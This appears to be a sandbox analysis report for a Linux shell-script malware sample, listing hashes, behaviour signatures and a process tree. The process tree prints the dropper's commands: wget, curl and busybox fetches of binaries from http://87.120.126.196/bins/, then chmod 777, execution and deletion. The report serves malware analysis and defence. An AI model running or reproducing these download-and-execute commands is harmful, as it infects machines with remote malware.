Analysis
max time kernel
25s
max time network
69s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags
arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsel-20240611-en
General
Target
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Size
10KB
MD5
d230b0059d55644a966d0f2b3a653b23
SHA1
003616a6507ccbca767f2e56341b347b94f487da
SHA256
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2
SHA512
a1badc3ffaa64936805465c8e74e14083c226341b67e35b985dee197f0a8487e2d4c99fcb203e633dd67e60963b748b38a743e4d94b48038d381bfdd460e2f4f
SSDEEP
96:iwrwrw7vQ4vx64/jk3WKJsPGOhC+tlxnAltsw/JlJdJgJRJNJ1ChSkdz/jk3WK8i:ik4ET564/jk3vJsbIW6/jk3v3lk4ETgB
Malware Config
Signatures

File and Directory Permissions Modification  1 TTPs  19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
700  chmod
744  chmod
730  chmod
805  chmod
819  chmod
843  chmod
694  chmod
714  chmod
790  chmod
837  chmod
863  chmod
875  chmod
683  chmod
759  chmod
849  chmod
857  chmod
869  chmod
775  chmod
831  chmod

Executes dropped EXE  19 IoCs
ioc                                      pid  Process
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  685  3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  695  q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  701  eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  715  Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  731  SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  745  EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  760  v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  777  GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  791  GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  807  KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  821  IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  832  IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  838  XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  844  Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  850  Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  858  SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  864  EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  870  v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  876  KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj

Checks CPU configuration  1 TTPs  19 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
description              ioc            Process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl

Reads runtime system information
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl

Writes file to tmp directory  19 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                                      Process
File opened for modification  /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  curl
File opened for modification  /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  curl
File opened for modification  /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  curl
File opened for modification  /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  curl
File opened for modification  /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  curl
File opened for modification  /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  curl
File opened for modification  /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  curl
File opened for modification  /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  curl
File opened for modification  /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  curl
File opened for modification  /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  curl
File opened for modification  /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  curl
File opened for modification  /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  curl
File opened for modification  /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  curl
File opened for modification  /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  curl
File opened for modification  /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  curl
File opened for modification  /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  curl
File opened for modification  /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  curl
File opened for modification  /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  curl
File opened for modification  /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  curl
Processes
Each entry lists the process image, the command line and the PID. Indented entries are children of the sample's shell; bulleted lines under an entry are the signatures it triggered.

/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh  /tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh  PID:656
  /bin/rm  /bin/rm bins.sh  PID:657
  /usr/bin/wget  wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  PID:659
  /usr/bin/curl  curl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  PID:672
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  PID:681
  /bin/chmod  chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  PID:683
    - File and Directory Permissions Modification
  /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  ./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  PID:685
    - Executes dropped EXE
  /bin/rm  rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH  PID:686
  /usr/bin/wget  wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  PID:688
  /usr/bin/curl  curl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  PID:691
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  PID:693
  /bin/chmod  chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  PID:694
    - File and Directory Permissions Modification
  /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  ./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  PID:695
    - Executes dropped EXE
  /bin/rm  rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h  PID:696
  /usr/bin/wget  wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  PID:697
  /usr/bin/curl  curl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  PID:698
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  PID:699
  /bin/chmod  chmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  PID:700
    - File and Directory Permissions Modification
  /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  ./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  PID:701
    - Executes dropped EXE
  /bin/rm  rm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM  PID:702
  /usr/bin/wget  wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:703
  /usr/bin/curl  curl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:706
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:711
  /bin/chmod  chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:714
    - File and Directory Permissions Modification
  /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  ./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:715
    - Executes dropped EXE
  /bin/rm  rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:716
  /usr/bin/wget  wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:719
  /usr/bin/curl  curl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:724
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:727
  /bin/chmod  chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:730
    - File and Directory Permissions Modification
  /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  ./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:731
    - Executes dropped EXE
  /bin/rm  rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:732
  /usr/bin/wget  wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:734
  /usr/bin/curl  curl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:737
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:741
  /bin/chmod  chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:744
    - File and Directory Permissions Modification
  /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  ./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:745
    - Executes dropped EXE
  /bin/rm  rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:746
  /usr/bin/wget  wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:747
  /usr/bin/curl  curl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:751
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:756
  /bin/chmod  chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:759
    - File and Directory Permissions Modification
  /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  ./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:760
    - Executes dropped EXE
  /bin/rm  rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:761
  /usr/bin/wget  wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  PID:763
  /usr/bin/curl  curl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  PID:769
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  PID:772
  /bin/chmod  chmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  PID:775
    - File and Directory Permissions Modification
  /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  ./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  PID:777
    - Executes dropped EXE
  /bin/rm  rm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B  PID:778
  /usr/bin/wget  wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  PID:779
  /usr/bin/curl  curl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  PID:783
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  PID:787
  /bin/chmod  chmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  PID:790
    - File and Directory Permissions Modification
  /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  ./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  PID:791
    - Executes dropped EXE
  /bin/rm  rm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg  PID:792
  /usr/bin/wget  wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:794
  /usr/bin/curl  curl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:797
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:803
  /bin/chmod  chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:805
    - File and Directory Permissions Modification
  /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  ./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:807
    - Executes dropped EXE
  /bin/rm  rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:808
  /usr/bin/wget  wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  PID:810
  /usr/bin/curl  curl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  PID:813
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  PID:816
  /bin/chmod  chmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  PID:819
    - File and Directory Permissions Modification
  /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  ./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  PID:821
    - Executes dropped EXE
  /bin/rm  rm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  PID:822
  /usr/bin/wget  wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  PID:824
  /usr/bin/curl  curl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  PID:828
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  PID:830
  /bin/chmod  chmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  PID:831
    - File and Directory Permissions Modification
  /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  ./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  PID:832
    - Executes dropped EXE
  /bin/rm  rm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc  PID:833
  /usr/bin/wget  wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  PID:834
  /usr/bin/curl  curl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  PID:835
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  PID:836
  /bin/chmod  chmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  PID:837
    - File and Directory Permissions Modification
  /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  ./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  PID:838
    - Executes dropped EXE
  /bin/rm  rm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5  PID:839
  /usr/bin/wget  wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  PID:840
  /usr/bin/curl  curl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  PID:841
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  PID:842
  /bin/chmod  chmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  PID:843
    - File and Directory Permissions Modification
  /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  ./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  PID:844
    - Executes dropped EXE
  /bin/rm  rm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw  PID:845
  /usr/bin/wget  wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:846
  /usr/bin/curl  curl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:847
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:848
  /bin/chmod  chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:849
    - File and Directory Permissions Modification
  /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  ./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:850
    - Executes dropped EXE
  /bin/rm  rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd  PID:851
  /usr/bin/wget  wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:852
  /usr/bin/curl  curl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:853
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:855
  /bin/chmod  chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:857
    - File and Directory Permissions Modification
  /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  ./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:858
    - Executes dropped EXE
  /bin/rm  rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM  PID:859
  /usr/bin/wget  wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:860
  /usr/bin/curl  curl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:861
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:862
  /bin/chmod  chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:863
    - File and Directory Permissions Modification
  /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  ./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:864
    - Executes dropped EXE
  /bin/rm  rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI  PID:865
  /usr/bin/wget  wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:866
  /usr/bin/curl  curl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:867
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:868
  /bin/chmod  chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:869
    - File and Directory Permissions Modification
  /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  ./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:870
    - Executes dropped EXE
  /bin/rm  rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG  PID:871
  /usr/bin/wget  wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:872
  /usr/bin/curl  curl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:873
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:874
  /bin/chmod  chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:875
    - File and Directory Permissions Modification
  /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  ./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:876
    - Executes dropped EXE
  /bin/rm  rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj  PID:877
  /usr/bin/wget  wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy  PID:878
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97